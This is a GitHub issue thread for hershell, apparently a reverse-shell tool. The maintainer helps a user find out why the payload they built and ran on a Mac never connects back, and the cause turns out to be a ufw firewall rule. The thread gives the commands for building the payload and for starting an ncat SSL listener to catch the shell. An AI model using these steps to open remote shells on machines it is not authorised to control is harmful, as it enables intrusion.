### ISSUE TITLE
Can't catch shell

### ISSUE THREAD

**Issue by bceylan** [sysdream/hershell#5] opened 2018-03-06 14:48 UTC
Hi,

I followed the instructions and successfully created ssl certificate-key and built payload (make macos ...) on my ubuntu server. I transferred the file to my mac and executed it. However, ubuntu does not catch anything. Tried both with openssl and ncat.

**Comment by lesnuages** [comment] 2018-03-06 15:14
Hi @bceylan,

As I understand, your target system is Mac OS ? Could you tell me which version ? And which architecture ?

I'll try to reproduce on my side of things.

Also, could you provide me with the exact commands you typed to generate your payload and certificate ?

Thanks

**Comment by lesnuages** [comment] 2018-03-06 15:29
I just ran a quick test on a MacOS Sierra (10.12.6) iMac from 2015, and it works on my side.

You should note that the macos helper target only builds the payload for a 64 bits target system. This was due by a limitation from the go compiler at the time I wrote that target, but it seems to be resolved right now. I will update the make file to add the `macos32` and `macos64` targets.

Looking forward to the requested information from your side of things.

Thanks

**Comment by bceylan** [comment] 2018-03-06 16:27
Hi,

It is MBP mid 2014 running macOS High Sierra 10.13.3 so it is 64bit. make macos sets kernel as darwin and architecture as amd64. There shouldn't be any problem. I also tried running hershell as a sudoer but no luck.

**Comment by lesnuages** [comment] 2018-03-07 08:39
Ok, so the architecture doesn't seem to be a problem here ... maybe network filtering ?

Could you please provide me with the exact commands you typped:

* to generate the certificate
* to generate the payload
* to start your listening handler (openssl, socat, ncat or whatever you're using)

Without those information, I'm afraid I can't be of much more help ...

Thanks

**Comment by bceylan** [comment] 2018-03-07 17:10
Here are the commands I followed exactly:

1. go get github.com/sysdream/hershell
2. make depends
3. make macos LHOST=ubuntu server ip LPORT=1337
4. Copied hershell executable to mac and executed it
5. ncat --ssl --ssl-cert ./server.pem --ssl-key ./server.key -lvp 1337

Maybe port 1337 is filtered. I used 6127 as I found it's unassigned to anything on IANA but no hope.

**Comment by lesnuages** [comment] 2018-03-07 18:22
Just to be sure:

- are the two hosts are on the same network, or is the attacking machine (ubuntu) on the internet ?
- if they are not (and the attack machine is on the internet), are you aware of a network equipment being present, which could perform TLS interception ?

Since hershell has a certificate pinning feature, it will close the TCP connection if it cannot validate the certificate provided by the remote server. In case of TLS interception, the provided certificate would not be the one you created with `make depends`, which would result in a successful TCP connection, but a failed TLS connection.

To test this case, maybe you could run a network sniffer on your attack machine (tcpdump, wireshark, dumpcap), and see if you can observe:

- a successful TCP connection on the 1337 TCP port
- a successful TLS connection on the same port

I will push a debug branch, with a payload which prints to the standard output to help you debug.

EDIT: I just pushed a `debug` branch, please build your payload from this branch and send me the output in your next reply.

**Comment by bceylan** [comment] 2018-03-07 19:57
Attacker machine is on the internet. debug code prints ERR: Host unreachable.

tcpdump on port 1337 shows incoming tcp packets but no response is given even though the ncat is listening on the port. I'm not very familiar how to understand if such TCP connection is successful. I took networking class a long time ago :) What I can say is it tries 10 times with same seq id without any ack response. So I guess it just doesn't respond.

**Comment by lesnuages** [comment] 2018-03-07 20:23
Ok, so if I understand correctly, your attack machine is not answering to the TCP connection on port 1337.

Are you sure there isn't something which could filter the network trafic on the host ? Like iptables, firewalld, or ufw ?

Otherwise, I just pushed a new version on the debug branch to get a detailed error message. Could you pull the new version and give it a try ? To see if this is our assumption is correct.

One thing you could do, if you have the opportunity, is to try with another attacking machine.

Also, could you attach a PCAP file so I can see the output of `tcpdump`? You can output to a file with the `tcpdump -w file.pcap` option. If you don't want to disclose the IP address of both the attack machine or the victim, you can anonymize them with `tcprewrite` from the [tcpreplay suite](https://github.com/appneta/tcpreplay).

Looking forward to your response.

**Comment by bceylan** [comment] 2018-03-07 20:31
The problem was ufw. I allowed 1337/tcp in ufw and was able to catch the shell.

Thank you for your time.

**Comment by lesnuages** [comment] 2018-03-07 20:33
No problem, if it wasn't network filtering, I think I would have had a hard time finding the solution.

I'm closing this one.

**Closed as completed by lesnuages** 2018-03-07 20:33 UTC
Labels: NotABug, network issue
